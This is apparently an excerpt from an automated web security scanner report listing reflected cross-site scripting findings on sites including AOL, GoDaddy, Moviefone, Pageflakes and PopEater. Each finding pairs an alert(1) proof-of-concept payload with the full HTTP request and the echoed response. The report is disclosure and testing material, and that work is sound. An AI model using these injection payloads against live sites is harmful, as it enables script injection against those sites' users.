s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)do
...[SNIP]...

2.40. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae19"><script>alert(1)</script>22fc5ab7398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:29 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:28 GMT; path=/
Content-Type: text/html
Content-Length: 63649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1" />
...[SNIP]...

2.41. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7c4"-alert(1)-"b34755837c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:30 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:30 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:29 GMT; path=/
Content-Type: text/html
Content-Length: 63576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
le";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1";
s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)
...[SNIP]...

2.42. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4776d"><script>alert(1)</script>59ea0380dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4776d"><script>alert(1)</script>59ea0380dd4=1 HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:50 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:50 GMT; path=/
Keep-Alive: timeout=5, max=999969
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 109015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...
<link rel="canonical" href="http://www.moviefone.com/?4776d"><script>alert(1)</script>59ea0380dd4=1"/>
...[SNIP]...

2.43. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e187'-alert(1)-'e1daaea1081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscribe.aspx7e187'-alert(1)-'e1daaea1081 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:08 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=00AC81F260BA9A6D5FA9BF2E0A5F34B290777F13E4510D1166BCE4233715DDEC395F69E8143FCA0F905E564697A39C5855E5440A009381B14F7875F0917C6901D8FE5AE37B98CA6E21AAD688744FF342303E26421E926E5FA383B0022C4C45AF471CF31D7A9D60D5B866965A7C42DDCA932D74F3CA2E00A36A7F9949B4A359D81D6DCDB425DF75620502301B6EF64F4D920D4140F5819ED98494DEE07ECC46C9; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 14376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" id="StartupJSON">
var __getJsonQueryString = '?userName=subscribe.aspx7e187'-alert(1)-'e1daaea1081&r=634401657685468750';
document.write('<' + 'script type="text/javascript" id="GetJSON" src="/GetJSON.ashx' + __getJsonQueryString + '">
...[SNIP]...

2.44. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ee6f</script><script>alert(1)</script>846c743547c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscribe.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:05 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=09FEB47CFC6C6A3A9CA82F8313EDF2FE88BD584DCED8EA19F6FD5A6B17B4D3C5BFF448D5D70CC1BF473FFFE48C5DBACF66A47473612D3815F39076794F7B12ACF3C8D603D3511D39B29AD35BD13D362716DCA879751F283A6D1327219E1B538164FF4EA0D7830D9FB100B88E01C8BDB5DB7CF2F4D2637593CD2A55D43ECD5000BA7FB7D32E5787A99668E771D32E757968FCD8E1FC9BF5EEEC2F1574D9F16181; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Add feed
...[SNIP]...
document.referrer;
}
else
{
//I clicked the "add to pageflakes link". Please add this feed in my pageflakes page
var redirectUrl = 'subscribe2.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1';
document.location.href="#marker";
document.location.href= redirectUrl;
}
</script>
...[SNIP]...

2.45. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d2e1"-alert(1)-"80c66c7340 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?6d2e1"-alert(1)-"80c66c7340=1 HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:56 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:56 GMT; path=/
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
" ;
s_265.linkInternalFilters="javascript:,popeater.com";
    s_265.prop2="news";
    s_265.prop1="popeater";
    s_265.prop6custom="";
    s_265.prop12= "http://www.popeater.com/?6d2e1"-alert(1)-"80c66c7340=1";
    s_265.channel="us.newspop";
    s_265.disablepihost=false;
    s_265.disablepipath=false;
    s_265.mmxtitle="";
    s_265.mmxcustom="";
    s_265.mmxgo=true;
s_265.t
...[SNIP]...

2.46. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /hub/app-reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40b1"-alert(1)-"ce34c6a708f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1 HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size7b4de%22%3E%3Cscript%3Ealert(1)%3C/script%3E118786fa1f1=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:21 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:21 GMT; path=/
Content-Type: text/html
Content-Length: 32731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...
l="wb.tuaw";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,tuaw.com";
s_265.mmxgo = true;
s_265.prop1="Tech";
s_265.prop2="show-hub-apps";
s_265.prop12="http://www.tuaw.com/hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1";
s_265.prop16="TUAW";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="mtc";
s_265.prop22="16";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.47. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 4ed38<script>alert(1)</script>672c0d44255 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:59 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=MOIOEHOALFKFLEHAKEPOPGGK; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255</b>
...[SNIP]...

2.48. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7508f<script>alert(1)</script>c497b79206d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:46 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=AMIOEHOAKNNAOPGJAGICKMHH; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d</b>
...[SNIP]...

2.49. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 55b68<script>alert(1)</script>34586a0b13b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:42 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FLIOEHOAOGCDEGEAJKDIKAPM; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b</b>
...[SNIP]...

2.50. http://www.aol.com/ [dlact cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1124"-alert(1)-"6a0d04d96d1 was submitted in the dlact cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2a1124"-alert(1)-"6a0d04d96d1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=47F3597F5AADCEB36B262F261CE5067A; Path=/aol
Content-Length: 63405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl2a1124"-alert(1)-"6a0d04d96d1";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 13;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

2.51. http://www.aol.com/ [rrpmo1 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the rrpmo1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d687"-alert(1)-"65e99ea59a8 was submitted in the rrpmo1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~05d687"-alert(1)-"65e99ea59a8; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=5BD36E2786B24B66765E62769A9E47BB; Path=/aol
Content-Length: 63383

